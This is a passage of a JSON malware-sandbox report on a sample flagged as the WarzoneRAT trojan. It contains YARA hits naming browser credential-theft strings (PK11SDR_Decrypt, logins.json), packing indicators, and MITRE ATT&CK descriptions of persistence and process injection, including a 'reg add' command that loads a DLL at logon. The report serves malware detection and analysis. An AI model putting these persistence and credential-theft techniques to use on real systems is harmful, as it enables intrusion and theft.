00 }', '{ C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }', '{ C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }', '{ C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }', '{ C6 85 6E FB FF FF 6D C6 85 6F FB FF FF 6F C6 85 70 FB FF FF 72 C6 85 71 FB FF FF 79 C6 85 72 FB FF FF 00 }', '{ C6 85 C6 FE FF FF 6E C6 85 C7 FE FF FF 5C C6 85 C8 FE FF FF 63 C6 85 C9 FE FF FF 6F C6 85 CA FE FF FF 6D C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }', '{ C6 85 C7 FE FF FF 5C C6 85 C8 FE FF FF 63 C6 85 C9 FE FF FF 6F C6 85 CA FE FF FF 6D C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }', '{ C6 85 C8 FE FF FF 63 C6 85 C9 FE FF FF 6F C6 85 CA FE FF FF 6D C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }', '{ C6 85 C9 FE FF FF 6F C6 85 CA FE FF FF 6D C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }', '{ C6 85 CA FE FF FF 6D C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }', '{ C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }', '{ C6 85 A3 F5 FF FF 6C C6 85 A4 F5 FF FF 6C C6 85 A5 F5 FF FF 22 C6 85 A6 F5 FF FF 29 C6 85 A7 F5 FF FF 2E C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }', '{ C6 85 A4 F5 FF FF 6C C6 85 A5 F5 FF FF 22 C6 85 A6 F5 FF FF 29 C6 85 A7 F5 FF FF 2E C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }', '{ C6 85 A5 F5 FF FF 22 C6 85 A6 F5 FF FF 29 C6 85 A7 F5 FF FF 2E C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }', '{ C6 85 A6 F5 FF FF 29 C6 85 A7 F5 FF FF 2E C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }', '{ C6 85 A7 F5 FF FF 2E C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }', '{ C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }', '{ C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }']'" }, { "Hit": "PID 4492 triggered the Yara rule 'WarzoneRAT' with data '['PK11_CheckUserPassword', 'PK11_Authenticate', 'PK11SDR_Decrypt', 'SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList', 'AVE_MARIA', '127.0.0.', 'R\\x00D\\x00P\\x00C\\x00l\\x00i\\x00p\\x00', 'G\\x00r\\x00a\\x00b\\x00b\\x00e\\x00r\\x00', '@\\x00\\\\\\x00c\\x00m\\x00d\\x00.\\x00e\\x00x\\x00e\\x00', '/\\x00n\\x00:\\x00%\\x00t\\x00e\\x00m\\x00p\\x00%\\x00\\\\\\x00e\\x00l\\x00l\\x00o\\x00c\\x00n\\x00a\\x00k\\x00.\\x00x\\x00m\\x00l\\x00', \"H\\x00e\\x00y\\x00 \\x00I\\x00'\\x00m\\x00 \\x00A\\x00d\\x00m\\x00i\\x00n\\x00\", 's\\x00o\\x00f\\x00t\\x00o\\x00k\\x00n\\x003\\x00.\\x00d\\x00l\\x00l\\x00', 'n\\x00s\\x00s\\x003\\x00.\\x00d\\x00l\\x00l\\x00', 'l\\x00o\\x00g\\x00i\\x00n\\x00s\\x00.\\x00j\\x00s\\x00o\\x00n\\x00']'" }, { "Hit": "PID 4492 triggered the Yara rule 'INDICATOR_EXE_Packed_ASPack' with data '['{ 00 00 C0 2E 61 73 70 61 63 6B 00 00 }']'" } ], "new_data": [], "alert": false, "families": [] }, { "name": "static_pe_anomaly", "description": "Anomalous binary characteristics", "categories": [ "static" ], "severity": 3, "weight": 1, "confidence": 80, "references": [], "data": [ { "anomaly": "Entrypoint of binary is located outside of any mapped sections" } ], "new_data": [], "alert": false, "families": [] } ], "malscore": 10.0, "ttps": [ { "signature": "resumethread_remote_process", "ttps": [ "T1055" ], "mbcs": [] }, { "signature": "persistence_autorun", "ttps": [ "T1547.001", "T1112", "T1547" ], "mbcs": [ "OB0012", "E1112", "F0012" ] }, { "signature": "enumerates_running_processes", "ttps": [ "T1057" ], "mbcs": [ "OB0007" ] }, { "signature": "cmdline_terminate", "ttps": [ "T1059" ], "mbcs": [ "OB0009", "E1059" ] }, { "signature": "script_tool_executed", "ttps": [ "T1064", "T1059" ], "mbcs": [ "OB0009", "E1059" ] }, { "signature": "uses_windows_utilities", "ttps": [ "T1202" ], "mbcs": [ "OB0009", "E1203.m06" ] } ], "malstatus": "Malicious", "mitre_attck": { "Persistence": [ { "t_id": "T1547", "ttp_name": "Boot or Logon Autostart Execution", "description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\n\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.", "signature": [ "persistence_autorun" ] }, { "t_id": "T1547.001", "ttp_name": "Registry Run Keys / Startup Folder", "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup. The startup folder path for all users is C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp.\n\nThe following run keys are created by default on Windows systems:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit and HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell subkeys can automatically launch programs.\n\nPrograms listed in the load value of the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows run when any user logs on.\n\nBy default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", "signature": [ "persistence_autorun" ] } ], "Privilege Escalation": [ { "t_id": "T1547", "ttp_name": "Boot or Logon Autostart Execution", "description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\n\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.", "signature": [ "persistence_autorun" ] }, { "t_id": "T1055", "ttp_name": "Process Injection", "description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ", "signature": [ "resumethread_remote_process" ] }, { "t_id": "T1547.001", "ttp_name": "Registry Run Keys / Startup Folder", "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup. The startup folder path for all users is C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp.\n\nThe following run keys are created by default on Windows systems:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit and HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell subkeys can automatically launch programs.\n\nPrograms listed in the load value of the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows run when any user logs on.\n\nBy default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", "signature": [ "persistence_autorun" ] } ], "Defense Evasion": [ { "t_id": "T1202", "ttp_name": "Indirect Command Execution", "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.", "signature": [ "uses_windows_utilities" ] }, { "t_id": "T1055", "ttp_name": "Process Injection", "description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ", "signature": [ "resumethread_remote_process" ] }, { "t_id": "T1112", "ttp_name": "Modify Registry", "description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.", "signature": [ "persistence_autorun" ] }, { "t_id": "T1064", "ttp_name": "Scripting", "description": "**This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.**\n\nAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", "signature": [ "script_tool_executed" ] } ], "Execution": [ { "t_id": "T1059", "ttp_name": "Command and Scripting Interpreter", "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nThere are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)", "signature": [ "cmdline_terminate", "script_tool_executed" ] }, { "t_id": "T1064", "ttp_name": "Scripting", "description": "**This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.**\n\nAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", "signature": [ "script_tool_executed" ] } ], "Discovery": [ { "t_id": "T1057", "ttp_name": "Process Discovery", "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.", "signature": [ "enumerates_running_processes" ] } ] } }